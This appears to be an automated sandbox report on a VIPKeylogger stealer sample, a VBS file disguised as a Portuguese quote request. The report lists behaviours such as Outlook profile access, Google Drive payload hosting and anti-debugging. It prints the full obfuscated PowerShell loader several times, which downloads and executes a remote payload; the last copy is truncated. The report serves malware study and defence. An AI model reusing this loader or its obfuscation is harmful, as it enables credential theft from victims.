Malware Analysis Report

2024-11-30 14:56

Sample ID 241101-gbae1axgkp
Target cb79db36a5a57ef1bad70615aa6d8bb2b293c31d1ead57ce7d16efc387172c2f.r00
SHA256 cb79db36a5a57ef1bad70615aa6d8bb2b293c31d1ead57ce7d16efc387172c2f
Tags
execution vipkeylogger collection discovery keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

cb79db36a5a57ef1bad70615aa6d8bb2b293c31d1ead57ce7d16efc387172c2f

Threat Level: Known bad

The file cb79db36a5a57ef1bad70615aa6d8bb2b293c31d1ead57ce7d16efc387172c2f.r00 was found to be: Known bad.

Malicious Activity Summary

execution vipkeylogger collection discovery keylogger stealer

VIPKeylogger

Vipkeylogger family

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Legitimate hosting services abused for malware hosting/C2

Command and Scripting Interpreter: PowerShell

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

outlook_win_path

outlook_office_path

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-01 05:37

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-01 05:37

Reported

2024-11-01 05:39

Platform

win7-20240903-en

Max time kernel

150s

Max time network

117s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Chefkahytter forforstrkeren Stipendiary Aglossa Optegnendes #>;$Fllesmarkeder='Crinet';<#Suppressedly Regnskabsadministration ministerielle Addeem Inviolate Blanketters Unperfectedness #>; function Dksdrengene($glottalise){If ($host.DebuggerEnabled) {$Homomorphic144++;}$Peberms=$Bildkkene+$glottalise.'Length'-$Homomorphic144; for ( $Sheveret=5;$Sheveret -lt $Peberms;$Sheveret+=6){$coccygomorphic=$Sheveret;$Monoplegic+=$glottalise[$Sheveret];}$Monoplegic;}function Chaplin($Skrvebanens){ & ($Samtaleemnets) ($Skrvebanens);}$Umaadelighedens=Dksdrengene 'JimsoML,ndioAnthez eneaiJong,lCassylJed,yaSwabb/Papir ';$Flabellate=Dksdrengene ' isbuTPres l de fsCi il1Coldp2M.ckl ';$Hoste=' Noni[JanglnUn coeGentiT Vent. eateSHjforePart rHypotvTi,skiMindecMillie HawapsaneroStoreI SortNPreacTCognimDilata ToxinChewya Hom g Tilhe RechrUdetj] Arbe:inter:Varmts Telee Dyppc ekruUFuse.R Lat ID lseTSubdiY DisapKeltiRSels oP einTArb jo atsucDicynoSmrreLSpeed=Abamp$FimrefFo maLBu,ikA Gy nBShi.iEDis oLFilmsLT,onsA ArcftPalteeDiffe ';$Umaadelighedens+=Dksdrengene 'Coy,o5L.nds.backi0 aby Ejend(YampaWPro riHauntnH drod orhaoTittlwProsksTreet EctypNP repTSpnen over 1Remna0 Disp. anc0 Perr;tun,t Ac eWRe ruiHand n Tilg6Sagsb4P xie;Unawk Flerexdi ul6Under4Satsn;Skate ErindrRabbiv Clup:St nd1Tippe3 ,ilo1 mmet. C rr0 He.r)Skri ommaGFdepue kompc hoejk PolloBhuta/Kanal2Voves0elect1Tumbe0Ni,zs0Kolle1Xeno,0Svmm 1 Hype BrkkeFVirkeiChapprPe iteDubitfExocroDoctrxUskyl/Mlkeg1Mreng3Skrdd1Ar,vr..etti0Deci ';$Nedenstaaende=Dksdrengene 'Rke nUSviklSKei tEJaevnRCorra-Unr.sABan lgLa,dge EnevnPunsttHubri ';$Ekspatrieres=Dksdrengene 'Mainph onpht egnet fuldp ira scongl:Krubu/Tryk./CemendPh.torNormaiSkattvRealieKunst.vitrygGuileoSlvfao Omstg Tikrl ebraeBim t. Me oc BomboCountmHuspl/HusleuFarvec Klan? ossteParadxPeritpChayooUnve,rWifectO den=brepodIndbao mmanwQuad.nUrethlOrganoBabyeaBevb dGorsi& .heoiPail d Pike= apsa1PossePPotenKCircux DiaxMstatsT R,diDDaa seOverc3HenrehSampaq Char4 U.orJRolfdN Kaf KPopulXSla ntSammec Ka ixAstro-KrambKHyperTTmmerZAdullnDatais Unp 5 omspv Re,rOThanjlAdstrp rsnoUn onw,edegdEs,oi ';$Ambari=Dksdrengene 'Eksal> Stif ';$Samtaleemnets=Dksdrengene 'Tran iFagudEHerskX amat ';$Sethite='Flynders';$Clotildes='\Kondemnations.Stu';Chaplin (Dksdrengene 'Torne$Ele tGP ysolTinseoFaktobEmptna ,qualAnthr:datasUM lonv d udr quipGMatkaEFormiLDatalI sjlegSupertUnre,= Disc$Eti leSamstnArachVAccre:falceADkninpSinclPWoodjDHusmnA JaetTInapoA onos+ Mili$AktivCSolskL YpuroDigittSo,gsICog.alEpitodDiploE Ultrs Rese ');Chaplin (Dksdrengene 'Nonma$TightG sterlDruesOSilkibMingla O,isLSmote: RathKPriodI MelilrefekdPaloneforhoS UnveKStaveA.ndretGengiT astee D,gslNov.lOKonfivMes ieambignPakkeeHodopSMusic=Wei.h$ rutsECl.akK Drn sHauynp AmiaALngdetChampRS.netI.igorEMisprrW.ippesnustSAffor. elveSNiflipReverL spuniCraniTChara( Pylo$Re lyaD skeMRompeB .ustaCorpoRRepariAviga)Orth ');Chaplin (Dksdrengene $Hoste);$Ekspatrieres=$Kildeskattelovenes[0];$ekstasens=(Dksdrengene ' Gor.$StorhG HoveL AfpeoAnnusBHadenaK mmoLCoqui:TruanP HistAForhalUn inARombueBarcoo Bookn amnie TrevMSvirvEKo trrGynnatKristISide NVauquEDete A Madl=AriasnExtr,eS,efaWBrand-AdmeaO moribBuckoJba cheDbuinC WellT Uddr OpnaaSmi asY Vsk,sClibaT Co,tec untMPolly. uarnNOeconEkildeT Fors.FletfWlumineFiskebDong c GentlJournIOkayse addlN ForuTfiske ');Chaplin ($ekstasens);Chaplin (Dksdrengene 'Under$ForkoPEmp.daAbdiclLampeaHaffieFul eoKy,linImprieGldssmCha,oeUncomr Bilat HangiGalopn Firee U deaShowu. SeriHZ lueeBranda Resed SankeCrumbrtonefsPenid[Dakty$Co ybNlatakerealedHovede Sk.an,maadsTusintNocena TopmaModk eTh,lenStalad unmue udic],arit=Sorte$Mell UWrangmTil aaSchleaPseudd Undse AmphlWeekeiDr ekgBorehhRampoeChilddHa sheImplenNon,psUnder ');$Stvfrie=Dksdrengene 'Voldg$MortiPU graabadgelLagonaC,evaeDelinoP ojenHurlieBo tfmsjakaeMen erNe frt Ashli ruppn,ilereInco a Nond.VssunD ToteoOpka wRengrnfo nulStvrioSkraaaYugaddgenerFFee,siSpagelReswie Deli(Wampu$T kstEExorckRe,ersF evapSortiaSkrivtElverrtransiExploeUimodrHakkeeFrem.sRepro,Nucl $Co teC atodrCykele ,lidsTres iEvangvOdon eParoc)Skrm ';$Cresive=$Uvrgeligt;Chaplin (Dksdrengene 'Metod$A sthG Li,vLBedetoUnderBRedemaLrestLGyldi:GerniD BlehISt rkS Lovek Ki.eA Symbn BetoT SesseOra gNUnfur=Udsvi(PatenT Hoveeforu SBilgkTErgot-SejlaPLuksuAcar vT.iktuh Un e Potb$ HexdCHj idrPsykieUndeps Id.nIVaredV ncoresocag)Vejle ');while (!$Diskanten) {Chaplin (Dksdrengene 'Masto$Hushtg ,lasl RhaboAltmubHoneyaBa milHype,:A ridSPakket m ltoPredirs.aldfS hoooB llerPriorb Ba,brStagguDecargKorseepraecrNoneasFotoa=,amac$ S.aet ucurCes pucalimeWivec ') ;Chaplin $Stvfrie;Chaplin (Dksdrengene 'Bark sMik oT ShinaSkinkrM croTChawb-NewfasSandwLProkleN.natEannmap Hink Sport4R,gnh ');Chaplin (Dksdrengene ' Part$MiksegIntraLBorgeoEddadbMachiADilatl Stea:Descad osiICastiSSuperKSmokeAH.llanEngo.TImpenEAtomanParec= Dens(UndelT Uds E plumsRepawtUddan-Chau.p OpbaaKo.materhveHNe.fo Pa e$meg lCI drerShagtegaardS.sychIGenopv UrnfeBackb)Dr.in ') ;Chaplin (Dksdrengene 'Mijn $Sinh GHvlveLZaithoGoldwbJenlgaMy teL A si:GrnttoPerikRTal,tAAut.kT etbuo KonfRTumidlPersoiTor,ekPreexeMobil5 He.e=Imm n$Me icg DdskLSpra oMisbeb Monoa TwisLex,an:.easeSSciamuContrBEmeroO Cla b .oudLNitriIAtommq Mel u inseEbeskiLSkaffY ande+ ubge+Umrke%Nonwh$TandrKSk,diIAtom LCap rdF,rdue edbeSBy nikC,ustA,ollatCu bstHulkoE ozerLVa,iooUnpriVDisprE adion RowtenamessRetro.Ser,ecPeripOSemipU SnvsN jarkTPrinc ') ;$Ekspatrieres=$Kildeskattelovenes[$Oratorlike5];}$Kloningens=291747;$Telexes=30474;Chaplin (Dksdrengene 'Antir$SortsgD.shalDictaO GormbPilheA RekrL inot:paaskB NonmE .ellNtkkelD olstE.chmoeFol eSFiske Skri=posty GrungEleaneDispotMikro-RetsfCgigaboH,rpsNSp bat t ruEU worNi.dhaTAutoe Ungra$Ho.otcDephyrDarkleStjflsbevilIClac.vQuadretid a ');Chaplin (Dksdrengene 'Peace$Nondig arbelRekoro.olfbbKnotna yleblSlutt:ExaspAArsend ovpre Sph l ManubGnaveeBerasrLa.ultOverl Theo=feci, Sp,ci[ Ca dS Sa ayH.mmesMai itlexipeGelinmSpade.miniaC KirkoOpalinAwarevPsil eGrsserRiccitGodm ]rrel : Oxya: R.keFUncanr ForaoBygdemPelagB Ra daA maisBo tpeUd in6Paatv4BrandSemmottHyd.trConv i VirinR ombg sthn(Busin$PersiBAnkyle EspanBoksedSkjuleSy teeKonkus Oilt)Streg ');Chaplin (Dksdrengene ' Dele$HonniG,alveLAl,ogO YoghBCustoaTuttslMaksi:ObjekSGoniowUnconiCorneLBr,llLRyk.eb raveoMlkenw SamlL Ends Kaske=Nunci Lever[Sockes LivlyFi.riSChro t.arsreOverlmHandw.NominTAseiseHam lXFuseltflles.DraabeNonilnBaranCPreacOBog.pdVideriArm.rnJoustGSlagv] Spil:Tiltv:Over aCoendSLandiCDeco,iDiscriExant.Skre GPsykoeSheltT S ksSTrollTTri crPeshkIFlydenO phaGUnap.(B rde$TribaaLinoldStatiET ntelSkilnberhveeTh ncrLectiTSyste) Kapi ');Chaplin (Dksdrengene 'Monos$ issegMotivlKvkkeoM tacb Cen.AB ugtlOprik:ZoomiF JubioStayerFortefSwartrCrumbeRegissHonni=T,del$UddybS HjerWFinkmiIngrelB dirl.lbanBArctoO H roW verflBilop.EfterS mateuPeridbTaanesMil iTJo neRGe riIUnpr,n ,latgFrede(I fra$ P ndKF,owslAdr soPulviNBibetiTutteNForesg,ekvieSol dN Tu.tSKalib,Piar $IsdantSekseE oreoLNonsiED ltrx sm keWilkeSChoco)Amph, ');Chaplin $Forfres;"

Network

N/A

Files

memory/2684-4-0x000007FEF666E000-0x000007FEF666F000-memory.dmp

memory/2684-7-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

memory/2684-8-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

memory/2684-6-0x0000000001F30000-0x0000000001F38000-memory.dmp

memory/2684-5-0x000000001B870000-0x000000001BB52000-memory.dmp

memory/2684-9-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

memory/2684-10-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

memory/2684-11-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

memory/2684-12-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

memory/2684-13-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

memory/2684-14-0x000007FEF666E000-0x000007FEF666F000-memory.dmp

memory/2684-15-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

memory/2684-16-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

memory/2684-17-0x000007FEF63B0000-0x000007FEF6D4D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-01 05:37

Reported

2024-11-01 05:39

Platform

win10v2004-20241007-en

Max time kernel

144s

Max time network

141s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Vipkeylogger family

vipkeylogger

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Pedido de Cotação -RFQ20241030_Pdf.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Chefkahytter forforstrkeren Stipendiary Aglossa Optegnendes #>;$Fllesmarkeder='Crinet';<#Suppressedly Regnskabsadministration ministerielle Addeem Inviolate Blanketters Unperfectedness #>; function Dksdrengene($glottalise){If ($host.DebuggerEnabled) {$Homomorphic144++;}$Peberms=$Bildkkene+$glottalise.'Length'-$Homomorphic144; for ( $Sheveret=5;$Sheveret -lt $Peberms;$Sheveret+=6){$coccygomorphic=$Sheveret;$Monoplegic+=$glottalise[$Sheveret];}$Monoplegic;}function Chaplin($Skrvebanens){ & ($Samtaleemnets) ($Skrvebanens);}$Umaadelighedens=Dksdrengene 'JimsoML,ndioAnthez eneaiJong,lCassylJed,yaSwabb/Papir ';$Flabellate=Dksdrengene ' isbuTPres l de fsCi il1Coldp2M.ckl ';$Hoste=' Noni[JanglnUn coeGentiT Vent. eateSHjforePart rHypotvTi,skiMindecMillie HawapsaneroStoreI SortNPreacTCognimDilata ToxinChewya Hom g Tilhe RechrUdetj] Arbe:inter:Varmts Telee Dyppc ekruUFuse.R Lat ID lseTSubdiY DisapKeltiRSels oP einTArb jo atsucDicynoSmrreLSpeed=Abamp$FimrefFo maLBu,ikA Gy nBShi.iEDis oLFilmsLT,onsA ArcftPalteeDiffe ';$Umaadelighedens+=Dksdrengene 'Coy,o5L.nds.backi0 aby Ejend(YampaWPro riHauntnH drod orhaoTittlwProsksTreet EctypNP repTSpnen over 1Remna0 Disp. anc0 Perr;tun,t Ac eWRe ruiHand n Tilg6Sagsb4P xie;Unawk Flerexdi ul6Under4Satsn;Skate ErindrRabbiv Clup:St nd1Tippe3 ,ilo1 mmet. C rr0 He.r)Skri ommaGFdepue kompc hoejk PolloBhuta/Kanal2Voves0elect1Tumbe0Ni,zs0Kolle1Xeno,0Svmm 1 Hype BrkkeFVirkeiChapprPe iteDubitfExocroDoctrxUskyl/Mlkeg1Mreng3Skrdd1Ar,vr..etti0Deci ';$Nedenstaaende=Dksdrengene 'Rke nUSviklSKei tEJaevnRCorra-Unr.sABan lgLa,dge EnevnPunsttHubri ';$Ekspatrieres=Dksdrengene 'Mainph onpht egnet fuldp ira scongl:Krubu/Tryk./CemendPh.torNormaiSkattvRealieKunst.vitrygGuileoSlvfao Omstg Tikrl ebraeBim t. Me oc BomboCountmHuspl/HusleuFarvec Klan? ossteParadxPeritpChayooUnve,rWifectO den=brepodIndbao mmanwQuad.nUrethlOrganoBabyeaBevb dGorsi& .heoiPail d Pike= apsa1PossePPotenKCircux DiaxMstatsT R,diDDaa seOverc3HenrehSampaq Char4 U.orJRolfdN Kaf KPopulXSla ntSammec Ka ixAstro-KrambKHyperTTmmerZAdullnDatais Unp 5 omspv Re,rOThanjlAdstrp rsnoUn onw,edegdEs,oi ';$Ambari=Dksdrengene 'Eksal> Stif ';$Samtaleemnets=Dksdrengene 'Tran iFagudEHerskX amat ';$Sethite='Flynders';$Clotildes='\Kondemnations.Stu';Chaplin (Dksdrengene 'Torne$Ele tGP ysolTinseoFaktobEmptna ,qualAnthr:datasUM lonv d udr quipGMatkaEFormiLDatalI sjlegSupertUnre,= Disc$Eti leSamstnArachVAccre:falceADkninpSinclPWoodjDHusmnA JaetTInapoA onos+ Mili$AktivCSolskL YpuroDigittSo,gsICog.alEpitodDiploE Ultrs Rese ');Chaplin (Dksdrengene 'Nonma$TightG sterlDruesOSilkibMingla O,isLSmote: RathKPriodI MelilrefekdPaloneforhoS UnveKStaveA.ndretGengiT astee D,gslNov.lOKonfivMes ieambignPakkeeHodopSMusic=Wei.h$ rutsECl.akK Drn sHauynp AmiaALngdetChampRS.netI.igorEMisprrW.ippesnustSAffor. elveSNiflipReverL spuniCraniTChara( Pylo$Re lyaD skeMRompeB .ustaCorpoRRepariAviga)Orth ');Chaplin (Dksdrengene $Hoste);$Ekspatrieres=$Kildeskattelovenes[0];$ekstasens=(Dksdrengene ' Gor.$StorhG HoveL AfpeoAnnusBHadenaK mmoLCoqui:TruanP HistAForhalUn inARombueBarcoo Bookn amnie TrevMSvirvEKo trrGynnatKristISide NVauquEDete A Madl=AriasnExtr,eS,efaWBrand-AdmeaO moribBuckoJba cheDbuinC WellT Uddr OpnaaSmi asY Vsk,sClibaT Co,tec untMPolly. uarnNOeconEkildeT Fors.FletfWlumineFiskebDong c GentlJournIOkayse addlN ForuTfiske ');Chaplin ($ekstasens);Chaplin (Dksdrengene 'Under$ForkoPEmp.daAbdiclLampeaHaffieFul eoKy,linImprieGldssmCha,oeUncomr Bilat HangiGalopn Firee U deaShowu. SeriHZ lueeBranda Resed SankeCrumbrtonefsPenid[Dakty$Co ybNlatakerealedHovede Sk.an,maadsTusintNocena TopmaModk eTh,lenStalad unmue udic],arit=Sorte$Mell UWrangmTil aaSchleaPseudd Undse AmphlWeekeiDr ekgBorehhRampoeChilddHa sheImplenNon,psUnder ');$Stvfrie=Dksdrengene 'Voldg$MortiPU graabadgelLagonaC,evaeDelinoP ojenHurlieBo tfmsjakaeMen erNe frt Ashli ruppn,ilereInco a Nond.VssunD ToteoOpka wRengrnfo nulStvrioSkraaaYugaddgenerFFee,siSpagelReswie Deli(Wampu$T kstEExorckRe,ersF evapSortiaSkrivtElverrtransiExploeUimodrHakkeeFrem.sRepro,Nucl $Co teC atodrCykele ,lidsTres iEvangvOdon eParoc)Skrm ';$Cresive=$Uvrgeligt;Chaplin (Dksdrengene 'Metod$A sthG Li,vLBedetoUnderBRedemaLrestLGyldi:GerniD BlehISt rkS Lovek Ki.eA Symbn BetoT SesseOra gNUnfur=Udsvi(PatenT Hoveeforu SBilgkTErgot-SejlaPLuksuAcar vT.iktuh Un e Potb$ HexdCHj idrPsykieUndeps Id.nIVaredV ncoresocag)Vejle ');while (!$Diskanten) {Chaplin (Dksdrengene 'Masto$Hushtg ,lasl RhaboAltmubHoneyaBa milHype,:A ridSPakket m ltoPredirs.aldfS hoooB llerPriorb Ba,brStagguDecargKorseepraecrNoneasFotoa=,amac$ S.aet ucurCes pucalimeWivec ') ;Chaplin $Stvfrie;Chaplin (Dksdrengene 'Bark sMik oT ShinaSkinkrM croTChawb-NewfasSandwLProkleN.natEannmap Hink Sport4R,gnh ');Chaplin (Dksdrengene ' Part$MiksegIntraLBorgeoEddadbMachiADilatl Stea:Descad osiICastiSSuperKSmokeAH.llanEngo.TImpenEAtomanParec= Dens(UndelT Uds E plumsRepawtUddan-Chau.p OpbaaKo.materhveHNe.fo Pa e$meg lCI drerShagtegaardS.sychIGenopv UrnfeBackb)Dr.in ') ;Chaplin (Dksdrengene 'Mijn $Sinh GHvlveLZaithoGoldwbJenlgaMy teL A si:GrnttoPerikRTal,tAAut.kT etbuo KonfRTumidlPersoiTor,ekPreexeMobil5 He.e=Imm n$Me icg DdskLSpra oMisbeb Monoa TwisLex,an:.easeSSciamuContrBEmeroO Cla b .oudLNitriIAtommq Mel u inseEbeskiLSkaffY ande+ ubge+Umrke%Nonwh$TandrKSk,diIAtom LCap rdF,rdue edbeSBy nikC,ustA,ollatCu bstHulkoE ozerLVa,iooUnpriVDisprE adion RowtenamessRetro.Ser,ecPeripOSemipU SnvsN jarkTPrinc ') ;$Ekspatrieres=$Kildeskattelovenes[$Oratorlike5];}$Kloningens=291747;$Telexes=30474;Chaplin (Dksdrengene 'Antir$SortsgD.shalDictaO GormbPilheA RekrL inot:paaskB NonmE .ellNtkkelD olstE.chmoeFol eSFiske Skri=posty GrungEleaneDispotMikro-RetsfCgigaboH,rpsNSp bat t ruEU worNi.dhaTAutoe Ungra$Ho.otcDephyrDarkleStjflsbevilIClac.vQuadretid a ');Chaplin (Dksdrengene 'Peace$Nondig arbelRekoro.olfbbKnotna yleblSlutt:ExaspAArsend ovpre Sph l ManubGnaveeBerasrLa.ultOverl Theo=feci, Sp,ci[ Ca dS Sa ayH.mmesMai itlexipeGelinmSpade.miniaC KirkoOpalinAwarevPsil eGrsserRiccitGodm ]rrel : Oxya: R.keFUncanr ForaoBygdemPelagB Ra daA maisBo tpeUd in6Paatv4BrandSemmottHyd.trConv i VirinR ombg sthn(Busin$PersiBAnkyle EspanBoksedSkjuleSy teeKonkus Oilt)Streg ');Chaplin (Dksdrengene ' Dele$HonniG,alveLAl,ogO YoghBCustoaTuttslMaksi:ObjekSGoniowUnconiCorneLBr,llLRyk.eb raveoMlkenw SamlL Ends Kaske=Nunci Lever[Sockes LivlyFi.riSChro t.arsreOverlmHandw.NominTAseiseHam lXFuseltflles.DraabeNonilnBaranCPreacOBog.pdVideriArm.rnJoustGSlagv] Spil:Tiltv:Over aCoendSLandiCDeco,iDiscriExant.Skre GPsykoeSheltT S ksSTrollTTri crPeshkIFlydenO phaGUnap.(B rde$TribaaLinoldStatiET ntelSkilnberhveeTh ncrLectiTSyste) Kapi ');Chaplin (Dksdrengene 'Monos$ issegMotivlKvkkeoM tacb Cen.AB ugtlOprik:ZoomiF JubioStayerFortefSwartrCrumbeRegissHonni=T,del$UddybS HjerWFinkmiIngrelB dirl.lbanBArctoO H roW verflBilop.EfterS mateuPeridbTaanesMil iTJo neRGe riIUnpr,n ,latgFrede(I fra$ P ndKF,owslAdr soPulviNBibetiTutteNForesg,ekvieSol dN Tu.tSKalib,Piar $IsdantSekseE oreoLNonsiED ltrx sm keWilkeSChoco)Amph, ');Chaplin $Forfres;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Chefkahytter forforstrkeren Stipendiary Aglossa Optegnendes #>;$Fllesmarkeder='Crinet';<#Suppressedly Regnskabsadministration ministerielle Addeem Inviolate Blanketters Unperfectedness #>; function Dksdrengene($glottalise){If ($host.DebuggerEnabled) {$Homomorphic144++;}$Peberms=$Bildkkene+$glottalise.'Length'-$Homomorphic144; for ( $Sheveret=5;$Sheveret -lt $Peberms;$Sheveret+=6){$coccygomorphic=$Sheveret;$Monoplegic+=$glottalise[$Sheveret];}$Monoplegic;}function Chaplin($Skrvebanens){ & ($Samtaleemnets) ($Skrvebanens);}$Umaadelighedens=Dksdrengene 'JimsoML,ndioAnthez eneaiJong,lCassylJed,yaSwabb/Papir ';$Flabellate=Dksdrengene ' isbuTPres l de fsCi il1Coldp2M.ckl ';$Hoste=' Noni[JanglnUn coeGentiT Vent. eateSHjforePart rHypotvTi,skiMindecMillie HawapsaneroStoreI SortNPreacTCognimDilata ToxinChewya Hom g Tilhe RechrUdetj] Arbe:inter:Varmts Telee Dyppc ekruUFuse.R Lat ID lseTSubdiY DisapKeltiRSels oP einTArb jo atsucDicynoSmrreLSpeed=Abamp$FimrefFo maLBu,ikA Gy nBShi.iEDis oLFilmsLT,onsA ArcftPalteeDiffe ';$Umaadelighedens+=Dksdrengene 'Coy,o5L.nds.backi0 aby Ejend(YampaWPro riHauntnH drod orhaoTittlwProsksTreet EctypNP repTSpnen over 1Remna0 Disp. anc0 Perr;tun,t Ac eWRe ruiHand n Tilg6Sagsb4P xie;Unawk Flerexdi ul6Under4Satsn;Skate ErindrRabbiv Clup:St nd1Tippe3 ,ilo1 mmet. C rr0 He.r)Skri ommaGFdepue kompc hoejk PolloBhuta/Kanal2Voves0elect1Tumbe0Ni,zs0Kolle1Xeno,0Svmm 1 Hype BrkkeFVirkeiChapprPe iteDubitfExocroDoctrxUskyl/Mlkeg1Mreng3Skrdd1Ar,vr..etti0Deci ';$Nedenstaaende=Dksdrengene 'Rke nUSviklSKei tEJaevnRCorra-Unr.sABan lgLa,dge EnevnPunsttHubri ';$Ekspatrieres=Dksdrengene 'Mainph onpht egnet fuldp ira scongl:Krubu/Tryk./CemendPh.torNormaiSkattvRealieKunst.vitrygGuileoSlvfao Omstg Tikrl ebraeBim t. Me oc BomboCountmHuspl/HusleuFarvec Klan? ossteParadxPeritpChayooUnve,rWifectO den=brepodIndbao mmanwQuad.nUrethlOrganoBabyeaBevb dGorsi& .heoiPail d Pike= apsa1PossePPotenKCircux DiaxMstatsT R,diDDaa seOverc3HenrehSampaq Char4 U.orJRolfdN Kaf KPopulXSla ntSammec Ka ixAstro-KrambKHyperTTmmerZAdullnDatais Unp 5 omspv Re,rOThanjlAdstrp rsnoUn onw,edegdEs,oi ';$Ambari=Dksdrengene 'Eksal> Stif ';$Samtaleemnets=Dksdrengene 'Tran iFagudEHerskX amat ';$Sethite='Flynders';$Clotildes='\Kondemnations.Stu';Chaplin (Dksdrengene 'Torne$Ele tGP ysolTinseoFaktobEmptna ,qualAnthr:datasUM lonv d udr quipGMatkaEFormiLDatalI sjlegSupertUnre,= Disc$Eti leSamstnArachVAccre:falceADkninpSinclPWoodjDHusmnA JaetTInapoA onos+ Mili$AktivCSolskL 